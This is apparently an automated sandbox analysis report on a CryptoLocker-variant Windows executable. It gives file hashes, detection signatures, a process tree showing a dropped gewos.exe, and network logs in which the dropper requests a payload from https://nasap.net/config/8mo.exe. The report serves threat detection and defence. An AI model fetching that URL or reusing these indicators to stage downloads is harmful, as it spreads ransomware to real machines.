Overview

overview

10

Static

static

10

2024-03-09...er.exe

windows7-x64

9

2024-03-09...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2024, 17:45 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe

  • Size

    59KB

  • MD5

    e198d9b93ef99fd1b97ba2861ee6e21e

  • SHA1

    037e4c5bcd840f1bc8b55e185d3816bbdba1acdf

  • SHA256

    2ae82dcda31569c1502ff35952bb31f71e911cf0bb1265ce2e8f04f35e3c0135

  • SHA512

    174d6ae605a739a5b50e67403f594a4b718cdfd74f1e400b3a419da47912ed630a4f878ea2069906bc8d01777d125d21979127de5af625f9845c46df5abfb9a4

  • SSDEEP

    1536:btB9g/xtCSKfxLIc//Xr+/AO/kIZ3ft2nVuTKB6nggOlHdUHg:btng54SMLr+/AO/kIhfoKMHd5

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-09_e198d9b93ef99fd1b97ba2861ee6e21e_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3880
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:5048

Network

  • flag-us
    DNS
    183.142.211.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.142.211.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sat, 09 Mar 2024 17:46:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W301 NC:000000 UP:
  • flag-us
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    511921235bcgoogleusercontentcom
  • flag-us
    DNS
    205.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.178.17.96.in-addr.arpa
    IN PTR
    Response
    205.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-205deploystaticakamaitechnologiescom
  • flag-us
    DNS
    226.20.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.20.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 09 Mar 2024 17:46:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W NC:000000 UP:
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    193.78.101.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    193.78.101.95.in-addr.arpa
    IN PTR
    Response
    193.78.101.95.in-addr.arpa
    IN PTR
    a95-101-78-193deploystaticakamaitechnologiescom
  • flag-us
    DNS
    210.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    210.178.17.96.in-addr.arpa
    IN PTR
    Response
    210.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-210deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.7kB
     6.3kB
     17
    11

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    2.7kB
     47.1kB
     46
    39

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    183.142.211.20.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    183.142.211.20.in-addr.arpa

  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
     71 B
     1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
     122 B
     1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    205.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    205.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    226.20.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    226.20.18.104.in-addr.arpa

  • 8.8.8.8:53
    73.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    73.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    177 B
     89 B
     3
    1

    DNS Request

    www.nasap.net

    DNS Request

    www.nasap.net

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    193.78.101.95.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    193.78.101.95.in-addr.arpa

  • 8.8.8.8:53
    210.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    210.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    18.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    18.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe
    Filesize

    59KB

    MD5

    16f516b951a185d69c1bcd87a733160c

    SHA1

    7a82b30fa01e1c259cf553ffabc3a6cf167b8104

    SHA256

    fe59a1b742559bb6918da62e2780a3c59ea6d71d6e51e3bb334ce6d3cf956896

    SHA512

    a0b315dfff247be44a503883c4a3cfdc2bbddc28eef8310a855366770d21d01f99973f51d25be546592274a4c85a156c1572721a0cf27d350b89783db53f9426

    Download Submit

  • memory/3880-0-0x00000000020D0000-0x00000000020D6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/3880-1-0x00000000020D0000-0x00000000020D6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/3880-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/5048-20-0x0000000002120000-0x0000000002126000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.